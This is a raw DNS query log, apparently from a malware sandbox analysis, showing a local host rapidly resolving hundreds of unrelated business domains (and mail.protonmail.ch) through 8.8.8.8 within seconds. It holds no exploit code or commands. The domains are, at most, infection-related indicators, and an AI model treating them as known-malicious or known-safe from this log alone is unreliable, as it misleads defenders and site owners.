                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.642028093 CET192.168.2.58.8.8.80x7709Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.644730091 CET192.168.2.58.8.8.80xc0f8Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.658181906 CET192.168.2.58.8.8.80xd97bStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.680445910 CET192.168.2.58.8.8.80xbdeaStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.694313049 CET192.168.2.58.8.8.80xa011Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.811330080 CET192.168.2.58.8.8.80xe5daStandard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.845354080 CET192.168.2.58.8.8.80x92dcStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.878115892 CET192.168.2.58.8.8.80x90d2Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.909857988 CET192.168.2.58.8.8.80x82b1Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:17.925477028 CET192.168.2.58.8.8.80x6fcStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.085679054 CET192.168.2.58.8.8.80xf19dStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.116669893 CET192.168.2.58.8.8.80x7a20Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.140938997 CET192.168.2.58.8.8.80x3b0eStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.147183895 CET192.168.2.58.8.8.80x57cbStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.151164055 CET192.168.2.58.8.8.80xa2efStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.156964064 CET192.168.2.58.8.8.80x8228Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.337191105 CET192.168.2.58.8.8.80xbb74Standard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.633387089 CET192.168.2.58.8.8.80x681eStandard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.656163931 CET192.168.2.58.8.8.80xccacStandard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.680712938 CET192.168.2.58.8.8.80xe133Standard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.712234020 CET192.168.2.58.8.8.80xa974Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.743437052 CET192.168.2.58.8.8.80xb745Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.765585899 CET192.168.2.58.8.8.80xb7e0Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.771429062 CET192.168.2.58.8.8.80xc430Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.827584982 CET192.168.2.58.8.8.80x884aStandard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.827888966 CET192.168.2.58.8.8.80xef9eStandard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.843166113 CET192.168.2.58.8.8.80x39a2Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.857593060 CET192.168.2.58.8.8.80x92dcStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.874174118 CET192.168.2.58.8.8.80x5d47Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.874174118 CET192.168.2.58.8.8.80x51c5Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.886831045 CET192.168.2.58.8.8.80xcd2Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:18.927541018 CET192.168.2.58.8.8.80xf037Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.014863014 CET192.168.2.58.8.8.80xe2ceStandard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.126393080 CET192.168.2.58.8.8.80xe18cStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.129017115 CET192.168.2.58.8.8.80xb68dStandard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.139580965 CET192.168.2.58.8.8.80x327aStandard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.158296108 CET192.168.2.58.8.8.80xa1a4Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.265273094 CET192.168.2.58.8.8.80xbab0Standard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.285294056 CET192.168.2.58.8.8.80x82e1Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.312356949 CET192.168.2.58.8.8.80xf354Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.335680962 CET192.168.2.58.8.8.80x31adStandard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.378911018 CET192.168.2.58.8.8.80xed5bStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.380860090 CET192.168.2.58.8.8.80x882Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.411604881 CET192.168.2.58.8.8.80x9086Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.412395000 CET192.168.2.58.8.8.80x360aStandard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.426079035 CET192.168.2.58.8.8.80xddebStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.436698914 CET192.168.2.58.8.8.80x1faeStandard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.438208103 CET192.168.2.58.8.8.80x35f6Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.452706099 CET192.168.2.58.8.8.80xcaedStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.476974010 CET192.168.2.58.8.8.80x2a83Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.537415028 CET192.168.2.58.8.8.80x69cdStandard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.565937042 CET192.168.2.58.8.8.80x882bStandard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.662168980 CET192.168.2.58.8.8.80xca33Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.674215078 CET192.168.2.58.8.8.80x54edStandard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.693391085 CET192.168.2.58.8.8.80xc17dStandard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:19.857476950 CET192.168.2.58.8.8.80x92dcStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.125340939 CET192.168.2.58.8.8.80x2940Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.135508060 CET192.168.2.58.8.8.80xa34fStandard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.219872952 CET192.168.2.58.8.8.80xb2bStandard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.266411066 CET192.168.2.58.8.8.80x5186Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.266608000 CET192.168.2.58.8.8.80x27a9Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.280937910 CET192.168.2.58.8.8.80xae9bStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.400825977 CET192.168.2.58.8.8.80x4e8fStandard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.415975094 CET192.168.2.58.8.8.80x454Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.449035883 CET192.168.2.58.8.8.80x2e38Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.470252991 CET192.168.2.58.8.8.80x1a20Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.475735903 CET192.168.2.58.8.8.80x2055Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.757277012 CET192.168.2.58.8.8.80xed71Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:20.943051100 CET192.168.2.58.8.8.80x6aa7Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.015469074 CET192.168.2.58.8.8.80x2ea1Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.020663023 CET192.168.2.58.8.8.80x6ab7Standard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.051409006 CET192.168.2.58.8.8.80xd366Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.067734957 CET192.168.2.58.8.8.80x54c7Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.114573956 CET192.168.2.58.8.8.80x5e93Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.114804983 CET192.168.2.58.8.8.80x5112Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.160096884 CET192.168.2.58.8.8.80xaf95Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.218784094 CET192.168.2.58.8.8.80xfb5dStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.259267092 CET192.168.2.58.8.8.80xd679Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.297811985 CET192.168.2.58.8.8.80x5a13Standard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.375766039 CET192.168.2.58.8.8.80xac50Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.765923023 CET192.168.2.58.8.8.80x56d1Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.769687891 CET192.168.2.58.8.8.80xfe6dStandard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.806546926 CET192.168.2.58.8.8.80x11d3Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.904906034 CET192.168.2.58.8.8.80x92dcStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.938745022 CET192.168.2.58.8.8.80x4834Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:21.948216915 CET192.168.2.58.8.8.80x778dStandard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.013767004 CET192.168.2.58.8.8.80x139fStandard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.014314890 CET192.168.2.58.8.8.80x9b41Standard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.016737938 CET192.168.2.58.8.8.80x1430Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.063397884 CET192.168.2.58.8.8.80xdce2Standard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.063991070 CET192.168.2.58.8.8.80x8f54Standard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.064207077 CET192.168.2.58.8.8.80xb490Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.064827919 CET192.168.2.58.8.8.80x286bStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.156816006 CET192.168.2.58.8.8.80x52a0Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.406543970 CET192.168.2.58.8.8.80x27c7Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.413099051 CET192.168.2.58.8.8.80x8293Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.447470903 CET192.168.2.58.8.8.80x8072Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.487790108 CET192.168.2.58.8.8.80x4063Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.500468969 CET192.168.2.58.8.8.80x51dcStandard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.590236902 CET192.168.2.58.8.8.80x9858Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.651253939 CET192.168.2.58.8.8.80x662bStandard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.678878069 CET192.168.2.58.8.8.80x3662Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:22.885628939 CET192.168.2.58.8.8.80x840fStandard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.098454952 CET192.168.2.58.8.8.80xd017Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.136622906 CET192.168.2.58.8.8.80xf309Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.172244072 CET192.168.2.58.8.8.80xe148Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.172777891 CET192.168.2.58.8.8.80x9aabStandard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.203115940 CET192.168.2.58.8.8.80x543Standard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.359173059 CET192.168.2.58.8.8.80x3858Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.382709980 CET192.168.2.58.8.8.80x45aaStandard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.437388897 CET192.168.2.58.8.8.80xa30fStandard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.437388897 CET192.168.2.58.8.8.80x288dStandard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.515939951 CET192.168.2.58.8.8.80x2e83Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.523279905 CET192.168.2.58.8.8.80x8e4aStandard query (0)603888.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.540556908 CET192.168.2.58.8.8.80x8f36Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.542875051 CET192.168.2.58.8.8.80xb416Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.561741114 CET192.168.2.58.8.8.80xb593Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.568166018 CET192.168.2.58.8.8.80xc7d6Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.631530046 CET192.168.2.58.8.8.80x8870Standard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.631530046 CET192.168.2.58.8.8.80x3ceStandard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.692271948 CET192.168.2.58.8.8.80x442fStandard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.723763943 CET192.168.2.58.8.8.80xeb14Standard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.800580978 CET192.168.2.58.8.8.80x52f1Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.859081030 CET192.168.2.58.8.8.80x647cStandard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.874385118 CET192.168.2.58.8.8.80x1593Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:23.923975945 CET192.168.2.58.8.8.80x9fe3Standard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.018030882 CET192.168.2.58.8.8.80x8dcbStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.062563896 CET192.168.2.58.8.8.80x10e0Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.265898943 CET192.168.2.58.8.8.80xad18Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.353596926 CET192.168.2.58.8.8.80xc5a0Standard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.371340036 CET192.168.2.58.8.8.80xac5aStandard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.372832060 CET192.168.2.58.8.8.80x5e45Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.389313936 CET192.168.2.58.8.8.80xee39Standard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.389708042 CET192.168.2.58.8.8.80xe110Standard query (0)mail.protonmail.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.422050953 CET192.168.2.58.8.8.80x5822Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.423774004 CET192.168.2.58.8.8.80x952dStandard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.426034927 CET192.168.2.58.8.8.80x4ee4Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.477456093 CET192.168.2.58.8.8.80x2af4Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.525604010 CET192.168.2.58.8.8.80x9168Standard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.719353914 CET192.168.2.58.8.8.80x39a0Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.743448019 CET192.168.2.58.8.8.80x7c31Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.748545885 CET192.168.2.58.8.8.80x80fStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.802999973 CET192.168.2.58.8.8.80x454eStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.813236952 CET192.168.2.58.8.8.80xda73Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.813678980 CET192.168.2.58.8.8.80x174fStandard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.919684887 CET192.168.2.58.8.8.80xaefcStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:24.955496073 CET192.168.2.58.8.8.80x58a4Standard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.093800068 CET192.168.2.58.8.8.80x6b7aStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.190840960 CET192.168.2.58.8.8.80x25cStandard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.254533052 CET192.168.2.58.8.8.80x53a0Standard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.270889044 CET192.168.2.58.8.8.80x14f4Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.282742977 CET192.168.2.58.8.8.80x8eacStandard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.300271034 CET192.168.2.58.8.8.80xf762Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.354120016 CET192.168.2.58.8.8.80x3a5dStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.439800978 CET192.168.2.58.8.8.80x3b8eStandard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.568646908 CET192.168.2.58.8.8.80xed06Standard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.625428915 CET192.168.2.58.8.8.80x8f08Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.625428915 CET192.168.2.58.8.8.80x3326Standard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.717489004 CET192.168.2.58.8.8.80x80fStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.750129938 CET192.168.2.58.8.8.80x9f72Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.762759924 CET192.168.2.58.8.8.80xd5deStandard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:25.878674984 CET192.168.2.58.8.8.80x54baStandard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.140619993 CET192.168.2.58.8.8.80xbfd2Standard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.146681070 CET192.168.2.58.8.8.80x3720Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.208677053 CET192.168.2.58.8.8.80x2943Standard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.280723095 CET192.168.2.58.8.8.80x5430Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.307698011 CET192.168.2.58.8.8.80x71b6Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.484623909 CET192.168.2.58.8.8.80x3556Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.516520977 CET192.168.2.58.8.8.80x4811Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.616806984 CET192.168.2.58.8.8.80x7993Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.687045097 CET192.168.2.58.8.8.80xccabStandard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.687328100 CET192.168.2.58.8.8.80x4855Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:45:26.703803062 CET192.168.2.58.8.8.80xdb21Standard query (0)clysma.comA (IP address)IN (0x0001)false
